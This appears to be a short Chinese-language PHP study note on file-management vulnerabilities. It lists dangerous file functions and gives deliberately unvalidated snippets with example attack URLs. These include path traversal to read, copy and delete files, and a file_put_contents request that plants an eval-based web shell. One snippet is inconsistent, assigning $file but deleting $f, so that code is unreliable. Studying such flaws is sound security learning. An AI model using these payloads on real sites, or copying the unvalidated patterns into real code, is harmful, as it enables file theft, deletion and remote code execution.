文件管理漏洞 · PHP筆記

PHP 的用于文件管理的函數，如果輸入變量可由用戶提交，程序中也沒有做數據驗證，可能成為高危漏洞常見函數： copy、rmdir、unlink、delete、fwrite、 chmod、fgetc、fgetcsv、fgets、fgetss、file、file_get_contents 、fread、readfile、ftruncate、 file_put_contents、fputcsv、fputs fopen 增加刪除編寫修改 unlink ``` //test.php?f=../../demo.php $file=$_GET['f']; if (is_file($f)) { unlink($f); } ``` file_get_contents ``` //test.php?f=../../demo.php $file=$_GET['f']; echo file_get_contents($file); //不會輸出但是在瀏覽器查看源代碼可以查看demo.php的源代碼 ``` readfile ``` //test.php?f=../../demo.php $file=$_GET['f']; echo readfile($file); //輸出demo的長度不會輸出內容但是在瀏覽器查看源代碼可以查看demo.php的源代碼 ``` file_put_contents ``` //test.php?f=../../demo.php&text=<?php eval($_POST['CMD'])?> $file=$_GET['f']; $text=$_GET['text']; file_put_contents($file,$text); ``` copy ``` //test.php?f=../../demo.php&text=demo2.php $file=$_GET['f']; $text=$_GET['text']; copy($file,$text); ``` ``` //test.php?f=../../demo.php $file=$_GET['f']; fwrite(fopen($file,'a+'),'<?php phpinfo();?>'); ```